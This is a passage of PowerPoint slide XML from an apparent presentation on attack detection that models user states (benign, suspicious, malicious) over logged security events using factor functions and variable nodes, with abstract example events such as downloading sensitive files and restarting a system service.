          <p:nvSpPr>
            <p:cNvPr id="129" name="Shape 129"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3150294" y="773213"/>
              <a:ext cx="1" cy="887096"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1270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flipV="1">
              <a:off x="7252394" y="773213"/>
              <a:ext cx="1" cy="887096"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1270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 flipV="1">
              <a:off x="11887620" y="773213"/>
              <a:ext cx="1" cy="887096"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1270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 flipV="1">
              <a:off x="16508261" y="773213"/>
              <a:ext cx="1" cy="887096"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1270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flipV="1">
              <a:off x="21305730" y="773213"/>
              <a:ext cx="1" cy="887096"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1270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0" y="35306"/>
              <a:ext cx="927250" cy="440564"/>
            </a:xfrm>
            <a:prstGeom prst="rect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>
                <a:defRPr sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>EVENTS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Shape 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="228599" y="13478334"/>
            <a:ext cx="23454780" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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22710228" y="12990512"/>
            <a:ext cx="731344" cy="51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 i="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" i="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1"/>
              <a:t>time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="145" name="Group 145"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-20804" y="1190376"/>
            <a:ext cx="24041177" cy="3211280"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="24041176" cy="3211278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="138" name="Shape 138"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9700871" y="2583009"/>
              <a:ext cx="4551844" cy="511176"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BD5B0C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?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="Shape 139"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14751693" y="2583009"/>
              <a:ext cx="3716882" cy="511176"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="861001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?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="140" name="Shape 140"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5772339" y="2583009"/>
              <a:ext cx="3705912" cy="511176"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C3971A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?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="141" name="Shape 141"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1141429" y="2583009"/>
              <a:ext cx="4221477" cy="511176"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0B5D18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?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="142" name="Shape 142"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="18748631" y="2583009"/>
              <a:ext cx="5292546" cy="511176"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506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?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0" y="2465915"/>
              <a:ext cx="927250" cy="745364"/>
            </a:xfrm>
            <a:prstGeom prst="rect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l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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USER</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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STATE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="144" name="Shape 144"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="605003" y="0"/>
              <a:ext cx="3009256" cy="2081064"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -49444"/>
                <a:gd name="adj2" fmla="val 62865"/>
              </a:avLst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63500" dist="127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/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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benign</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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suspicious</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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rPr>
                <a:t>malicious</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="151" name="Group 151"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3231363" y="4378224"/>
            <a:ext cx="18142737" cy="3441701"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="18142736" cy="3441700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="146" name="Shape 146"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="-1"/>
              <a:ext cx="2" cy="3441702"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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 flipV="1">
              <a:off x="4284227" y="-1"/>
              <a:ext cx="1" cy="3441702"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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 flipV="1">
              <a:off x="8724625" y="-1"/>
              <a:ext cx="1" cy="3441702"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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 flipV="1">
              <a:off x="13357966" y="-1"/>
              <a:ext cx="1" cy="3441702"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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 flipV="1">
              <a:off x="18142736" y="-1"/>
              <a:ext cx="1" cy="3441702"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="156" name="Group 156"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3648626" y="4378224"/>
            <a:ext cx="17441771" cy="3418273"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="17441769" cy="3418272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="152" name="Shape 152"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="0" y="0"/>
              <a:ext cx="3674023" cy="3418273"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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 flipV="1">
              <a:off x="4525959" y="24401"/>
              <a:ext cx="3674308" cy="3369471"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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 flipV="1">
              <a:off x="9702485" y="21446"/>
              <a:ext cx="2962402" cy="3375381"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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 flipV="1">
              <a:off x="13884025" y="183919"/>
              <a:ext cx="3557745" cy="3210214"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="161" name="Group 161"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3418921" y="4389162"/>
            <a:ext cx="17128276" cy="21814"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="17128275" cy="21812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="157" name="Shape 157"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="21812"/>
              <a:ext cx="3705912" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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4362379" y="7691"/>
              <a:ext cx="3705913" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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8750519" y="7691"/>
              <a:ext cx="3705913" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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13422363" y="0"/>
              <a:ext cx="3705913" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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pic>
        <p:nvPicPr>
          <p:cNvPr id="162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088164" y="1257222"/>
            <a:ext cx="1821139" cy="18211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8" name="Group 168"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3690334" y="3039647"/>
            <a:ext cx="17635940" cy="682766"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="17635939" cy="682765"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="163" name="Shape 163"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="0" y="709"/>
              <a:ext cx="9249165" cy="682057"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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 flipV="1">
              <a:off x="4702522" y="127709"/>
              <a:ext cx="4673643" cy="517035"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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 flipH="1" flipV="1">
              <a:off x="9503164" y="133493"/>
              <a:ext cx="1" cy="505466"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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 flipH="1" flipV="1">
              <a:off x="9641227" y="69479"/>
              <a:ext cx="3331972" cy="448264"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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 flipH="1" flipV="1">
              <a:off x="9759352" y="0"/>
              <a:ext cx="7876587" cy="621551"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="635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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="174" name="Group 174"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1152049" y="3749959"/>
            <a:ext cx="22899748" cy="511176"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="22899746" cy="511175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="169" name="Shape 169"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8559442" y="0"/>
              <a:ext cx="4551844" cy="511175"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BD5B0C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suspicious</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="170" name="Shape 170"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13610264" y="0"/>
              <a:ext cx="3716882" cy="511175"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="861001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malicious</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="171" name="Shape 171"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4630910" y="0"/>
              <a:ext cx="3705912" cy="511175"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C3971A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suspicious</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="172" name="Shape 172"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="4221477" cy="511175"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0B5D18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benign</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="173" name="Shape 173"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="17607201" y="0"/>
              <a:ext cx="5292546" cy="511175"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506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malicious</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Shape 175"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23907725" y="13226347"/>
            <a:ext cx="325091" cy="51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fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr sz="2400" b="1"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr sz="2400" b="1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animBg="1" advAuto="0"/>
      <p:bldP spid="145" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="151" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="156" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="161" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="162" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="168" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="174" grpId="8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15735151" y="1160642"/>
            <a:ext cx="8199395" cy="2629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600">
                <a:solidFill>
                  <a:srgbClr val="00206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Factor functions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="00206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/>
            </a:r>
            <a:br>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="00206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</a:br>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>Defined based on the data from security/system, knowledge of the system, security experts opinion)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178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64988" y="8174542"/>
            <a:ext cx="5403043" cy="1360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83973" y="9914353"/>
            <a:ext cx="5178461" cy="1903874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957942" y="3711549"/>
            <a:ext cx="6348212" cy="2718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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" baseline="31999">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>: download sensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" baseline="31999">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>: restart system service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3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algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" baseline="31999">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>: user state when observing e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" baseline="31999">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="3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algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" baseline="31999">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>: user state when observing e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" baseline="31999">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181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969763" y="12204439"/>
            <a:ext cx="5393494" cy="136063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572114" y="1319392"/>
            <a:ext cx="8859235" cy="2134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600">
                <a:solidFill>
                  <a:srgbClr val="00206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Variable nodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="002060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lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>Defined based on the data from security/system logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Shape 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788821" y="8782975"/>
            <a:ext cx="5178460" cy="4255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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>Enumerate possible </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" baseline="31999"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  <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>, s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" baseline="31999">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>state sequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3200"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lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" i="1">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>benign, benign</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" i="1">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>benign, suspicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" i="1">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>benign, malicious,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" i="1">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" i="1">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>malicious, malicious</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
